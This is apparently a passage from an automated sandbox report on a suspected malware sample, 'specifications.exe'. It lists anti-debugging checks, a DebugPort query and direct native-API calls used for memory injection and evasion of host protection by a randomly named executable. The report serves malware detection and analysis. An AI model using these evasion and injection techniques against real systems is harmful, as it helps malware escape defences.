                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Process queried: DebugPort
                      Source: C:\Users\user\Desktop\specifications.exe, Code function: 2_2_00417C23 LdrLoadDll,2_2_00417C23
                      Source: C:\Users\user\Desktop\specifications.exe, Code function: 2_2_01140115 mov eax, dword ptr fs:[00000030h] 2_2_01140115
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01130274 mov eax, dword ptr fs:[00000030h]2_2_01130274
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084260 mov eax, dword ptr fs:[00000030h]2_2_01084260
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084260 mov eax, dword ptr fs:[00000030h]2_2_01084260
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084260 mov eax, dword ptr fs:[00000030h]2_2_01084260
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107826B mov eax, dword ptr fs:[00000030h]2_2_0107826B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE284 mov eax, dword ptr fs:[00000030h]2_2_010BE284
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE284 mov eax, dword ptr fs:[00000030h]2_2_010BE284
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01100283 mov eax, dword ptr fs:[00000030h]2_2_01100283
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01100283 mov eax, dword ptr fs:[00000030h]2_2_01100283
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01100283 mov eax, dword ptr fs:[00000030h]2_2_01100283
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902A0 mov eax, dword ptr fs:[00000030h]2_2_010902A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902A0 mov eax, dword ptr fs:[00000030h]2_2_010902A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov ecx, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011162A0 mov eax, dword ptr fs:[00000030h]2_2_011162A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011562D6 mov eax, dword ptr fs:[00000030h]2_2_011562D6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108A2C3 mov eax, dword ptr fs:[00000030h]2_2_0108A2C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902E1 mov eax, dword ptr fs:[00000030h]2_2_010902E1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902E1 mov eax, dword ptr fs:[00000030h]2_2_010902E1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010902E1 mov eax, dword ptr fs:[00000030h]2_2_010902E1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01116500 mov eax, dword ptr fs:[00000030h]2_2_01116500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01154500 mov eax, dword ptr fs:[00000030h]2_2_01154500
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE53E mov eax, dword ptr fs:[00000030h]2_2_010AE53E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090535 mov eax, dword ptr fs:[00000030h]2_2_01090535
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088550 mov eax, dword ptr fs:[00000030h]2_2_01088550
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088550 mov eax, dword ptr fs:[00000030h]2_2_01088550
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B656A mov eax, dword ptr fs:[00000030h]2_2_010B656A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B656A mov eax, dword ptr fs:[00000030h]2_2_010B656A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B656A mov eax, dword ptr fs:[00000030h]2_2_010B656A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B4588 mov eax, dword ptr fs:[00000030h]2_2_010B4588
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01082582 mov eax, dword ptr fs:[00000030h]2_2_01082582
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01082582 mov ecx, dword ptr fs:[00000030h]2_2_01082582
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE59C mov eax, dword ptr fs:[00000030h]2_2_010BE59C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011005A7 mov eax, dword ptr fs:[00000030h]2_2_011005A7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011005A7 mov eax, dword ptr fs:[00000030h]2_2_011005A7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011005A7 mov eax, dword ptr fs:[00000030h]2_2_011005A7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A45B1 mov eax, dword ptr fs:[00000030h]2_2_010A45B1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A45B1 mov eax, dword ptr fs:[00000030h]2_2_010A45B1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE5CF mov eax, dword ptr fs:[00000030h]2_2_010BE5CF
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE5CF mov eax, dword ptr fs:[00000030h]2_2_010BE5CF
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010865D0 mov eax, dword ptr fs:[00000030h]2_2_010865D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA5D0 mov eax, dword ptr fs:[00000030h]2_2_010BA5D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA5D0 mov eax, dword ptr fs:[00000030h]2_2_010BA5D0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC5ED mov eax, dword ptr fs:[00000030h]2_2_010BC5ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC5ED mov eax, dword ptr fs:[00000030h]2_2_010BC5ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010825E0 mov eax, dword ptr fs:[00000030h]2_2_010825E0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AE5E7 mov eax, dword ptr fs:[00000030h]2_2_010AE5E7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8402 mov eax, dword ptr fs:[00000030h]2_2_010B8402
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8402 mov eax, dword ptr fs:[00000030h]2_2_010B8402
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8402 mov eax, dword ptr fs:[00000030h]2_2_010B8402
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107C427 mov eax, dword ptr fs:[00000030h]2_2_0107C427
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E420 mov eax, dword ptr fs:[00000030h]2_2_0107E420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E420 mov eax, dword ptr fs:[00000030h]2_2_0107E420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107E420 mov eax, dword ptr fs:[00000030h]2_2_0107E420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01106420 mov eax, dword ptr fs:[00000030h]2_2_01106420
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113A456 mov eax, dword ptr fs:[00000030h]2_2_0113A456
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BE443 mov eax, dword ptr fs:[00000030h]2_2_010BE443
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A245A mov eax, dword ptr fs:[00000030h]2_2_010A245A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0107645D mov eax, dword ptr fs:[00000030h]2_2_0107645D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110C460 mov ecx, dword ptr fs:[00000030h]2_2_0110C460
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AA470 mov eax, dword ptr fs:[00000030h]2_2_010AA470
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AA470 mov eax, dword ptr fs:[00000030h]2_2_010AA470
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AA470 mov eax, dword ptr fs:[00000030h]2_2_010AA470
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113A49A mov eax, dword ptr fs:[00000030h]2_2_0113A49A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110A4B0 mov eax, dword ptr fs:[00000030h]2_2_0110A4B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010864AB mov eax, dword ptr fs:[00000030h]2_2_010864AB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B44B0 mov ecx, dword ptr fs:[00000030h]2_2_010B44B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010804E5 mov ecx, dword ptr fs:[00000030h]2_2_010804E5
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC700 mov eax, dword ptr fs:[00000030h]2_2_010BC700
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080710 mov eax, dword ptr fs:[00000030h]2_2_01080710
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B0710 mov eax, dword ptr fs:[00000030h]2_2_010B0710
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC720 mov eax, dword ptr fs:[00000030h]2_2_010BC720
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC720 mov eax, dword ptr fs:[00000030h]2_2_010BC720
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B273C mov eax, dword ptr fs:[00000030h]2_2_010B273C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B273C mov ecx, dword ptr fs:[00000030h]2_2_010B273C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B273C mov eax, dword ptr fs:[00000030h]2_2_010B273C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FC730 mov eax, dword ptr fs:[00000030h]2_2_010FC730
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01104755 mov eax, dword ptr fs:[00000030h]2_2_01104755
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B674D mov esi, dword ptr fs:[00000030h]2_2_010B674D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B674D mov eax, dword ptr fs:[00000030h]2_2_010B674D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B674D mov eax, dword ptr fs:[00000030h]2_2_010B674D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110E75D mov eax, dword ptr fs:[00000030h]2_2_0110E75D
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01080750 mov eax, dword ptr fs:[00000030h]2_2_01080750
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2750 mov eax, dword ptr fs:[00000030h]2_2_010C2750
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2750 mov eax, dword ptr fs:[00000030h]2_2_010C2750
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01088770 mov eax, dword ptr fs:[00000030h]2_2_01088770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01090770 mov eax, dword ptr fs:[00000030h]2_2_01090770
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112678E mov eax, dword ptr fs:[00000030h]2_2_0112678E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010807AF mov eax, dword ptr fs:[00000030h]2_2_010807AF
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011347A0 mov eax, dword ptr fs:[00000030h]2_2_011347A0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108C7C0 mov eax, dword ptr fs:[00000030h]2_2_0108C7C0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011007C3 mov eax, dword ptr fs:[00000030h]2_2_011007C3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A27ED mov eax, dword ptr fs:[00000030h]2_2_010A27ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A27ED mov eax, dword ptr fs:[00000030h]2_2_010A27ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010A27ED mov eax, dword ptr fs:[00000030h]2_2_010A27ED
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110E7E1 mov eax, dword ptr fs:[00000030h]2_2_0110E7E1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010847FB mov eax, dword ptr fs:[00000030h]2_2_010847FB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010847FB mov eax, dword ptr fs:[00000030h]2_2_010847FB
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109260B mov eax, dword ptr fs:[00000030h]2_2_0109260B
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE609 mov eax, dword ptr fs:[00000030h]2_2_010FE609
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010C2619 mov eax, dword ptr fs:[00000030h]2_2_010C2619
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0108262C mov eax, dword ptr fs:[00000030h]2_2_0108262C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B6620 mov eax, dword ptr fs:[00000030h]2_2_010B6620
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B8620 mov eax, dword ptr fs:[00000030h]2_2_010B8620
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109E627 mov eax, dword ptr fs:[00000030h]2_2_0109E627
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0109C640 mov eax, dword ptr fs:[00000030h]2_2_0109C640
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA660 mov eax, dword ptr fs:[00000030h]2_2_010BA660
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA660 mov eax, dword ptr fs:[00000030h]2_2_010BA660
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114866E mov eax, dword ptr fs:[00000030h]2_2_0114866E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114866E mov eax, dword ptr fs:[00000030h]2_2_0114866E
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B2674 mov eax, dword ptr fs:[00000030h]2_2_010B2674
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084690 mov eax, dword ptr fs:[00000030h]2_2_01084690
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01084690 mov eax, dword ptr fs:[00000030h]2_2_01084690
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BC6A6 mov eax, dword ptr fs:[00000030h]2_2_010BC6A6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010B66B0 mov eax, dword ptr fs:[00000030h]2_2_010B66B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA6C7 mov ebx, dword ptr fs:[00000030h]2_2_010BA6C7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010BA6C7 mov eax, dword ptr fs:[00000030h]2_2_010BA6C7
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011006F1 mov eax, dword ptr fs:[00000030h]2_2_011006F1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011006F1 mov eax, dword ptr fs:[00000030h]2_2_011006F1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE6F2 mov eax, dword ptr fs:[00000030h]2_2_010FE6F2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE6F2 mov eax, dword ptr fs:[00000030h]2_2_010FE6F2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE6F2 mov eax, dword ptr fs:[00000030h]2_2_010FE6F2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE6F2 mov eax, dword ptr fs:[00000030h]2_2_010FE6F2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0110C912 mov eax, dword ptr fs:[00000030h]2_2_0110C912
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FE908 mov eax, dword ptr fs:[00000030h]2_2_010FE908
                      Source: C:\Users\user\Desktop\specifications.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtWriteVirtualMemory: Direct from: 0x76F0490C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtReadVirtualMemory: Direct from: 0x76F02E8C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtCreateKey: Direct from: 0x76F02C6C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtSetInformationThread: Direct from: 0x76F02B4C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtQueryAttributesFile: Direct from: 0x76F02E6C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtAllocateVirtualMemory: Direct from: 0x76F048EC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtQuerySystemInformation: Direct from: 0x76F048CC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtOpenSection: Direct from: 0x76F02E0C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtSetInformationThread: Direct from: 0x76EF63F9
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtDeviceIoControlFile: Direct from: 0x76F02AEC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtCreateFile: Direct from: 0x76F02FEC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtOpenFile: Direct from: 0x76F02DCC
